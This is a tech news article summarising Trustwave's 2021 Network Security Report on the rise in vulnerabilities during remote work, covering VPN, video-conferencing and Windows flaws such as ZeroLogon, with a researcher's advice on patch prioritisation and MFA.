As employees transitioned to working from home, this created new vulnerabilities in systems designed for a centralized, in-office workforce and also resulted in a spike in cybercriminal activity.
This is according to the new 2021 Network Security Report conducted by the cybersecurity and managed security services provider Trustwave which is based on scans of millions of servers worldwide.
“The number of machines connected to the Internet and vulnerable to issues that were actively being exploited in the wild was staggering. Some of the CVEs had patches released over 2-3 years back. It is always alarming to see those types of stats around vulnerable devices,” Prutha Parikh, senior security research manager at Trustwave SpiderLabs, told SD Times.
One of the most common and serious breaches occurred due to unpatched VPN vulnerabilities. A major attack due to this issue was the Pulse Secure Connect Arbitrary File-Reading vulnerability, which was originally patched in April 2019, but was then accessed through REvil ransomware that gained access to the currency exchange Travelex’s network through this flaw.
A major new source of vulnerabilities was video conferencing platforms. One such malicious practice was “Zoom Bombing,” in which videoconferences are hijacked by disruptive trolls. Also, there were reports of a wormable, zero-click vulnerability in Jabber, which received a critical in severity rating and was patched by Cisco.
“Some trends like video conferencing software vulnerabilities saw a spike with distributed workforce last year. This was primarily because these applications were designed for ease of use rather than keeping security in mind. As these solutions continue to mature, there may be a slight drop in that trend. But, we will continue seeing a rise in cloud security issues and possibly more sophisticated supply chain attacks despite workforces returning to a hybrid model,” Parikh added.
The third major vulnerability trend involves Windows vulnerabilities, notably a critical vulnerability dubbed “Curveball” or “ChainofFools,” Windows 10 and Windows Server 2016/2019 along with many applications. This vulnerability made it possible for malicious actors to spoof certificates that rely on Windows CryptoAPI for signature validation.
Other Windows vulnerabilities included the wormable vulnerabilities SMBGhost or EternalDarkness and SIGRed. A major privilege escalation vulnerability named ZeroLogon surfaced which exploited the Netlogon Remote Protocol (MS-NRPC).
Parikh said that a major reason why these vulnerabilities exist is that organizations fail to prioritize vulnerabilities based on their environments since they are often unaware of which vulnerabilities pose the most risk. Also, server-side patching brings challenges like downtime of production systems as well as the possibility of breaking existing functionality, resulting in more reluctance from teams when it comes to remediation.
“Organizations should identify their most critical assets and accelerate patch management for these critical systems like VPNs and cloud interfaces. Automation is key to achieving continuous monitoring of vulnerabilities and remediation. Applying other security best practices like least privileged access, zero trust solutions, and scalable MFA can also aid in prevention. Comprehensive security includes both a proactive and reactive approach, so detection and response are as important as preventative measures in dealing with attacks,” Parikh added.